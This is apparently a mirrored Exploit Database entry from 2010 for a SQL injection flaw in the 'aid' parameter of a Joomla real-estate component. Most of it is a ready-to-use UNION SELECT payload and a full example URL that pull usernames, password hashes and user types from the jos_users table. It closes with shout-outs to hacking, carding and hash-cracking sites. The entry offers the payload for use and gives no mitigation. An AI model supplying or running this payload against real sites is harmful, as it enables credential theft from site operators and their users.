Joomla! Component Real Estate Property 3.1.22-03 – ‘aid’ SQL Injection

• Exploit Database
• 15 阅读

• 作者： c4uR
  日期： 2010-04-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12136/

• +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  
  Author: c4uR [caurcdma@yahoo.com]
  Date: April, 10-2010 [INDONESIA]
  Exploit Title: Joomla Component com_properties[aid] SQL Injection Vulnerability
  
  +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  
  ###################################################################################
  
  +++ Vulnerable File +++
   http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=[gubr4k]
  
  +++ ExploiT +++
   -91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
  
  +++ Example +++
   http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--
  
  
  
  ###################################################################################
  
  ----------------------------------------------------------------------------------
  
  DEVILZC0DE.ORG + INDONESIANHACKER.ORG + HACKER-NEWBIE.ORG + YOGYACARDERLINK.WEB.ID
  hashkiller.com + insidepro.com + xaknet.ru + turkishajan.com
  
  ----------------------------------------------------------------------------------
  
  [ thnx to ]
  
  [+] Apartement Griya Semanggi + poisonV
  [+] Indonesia gg ada matinye, walaupun terkadang suram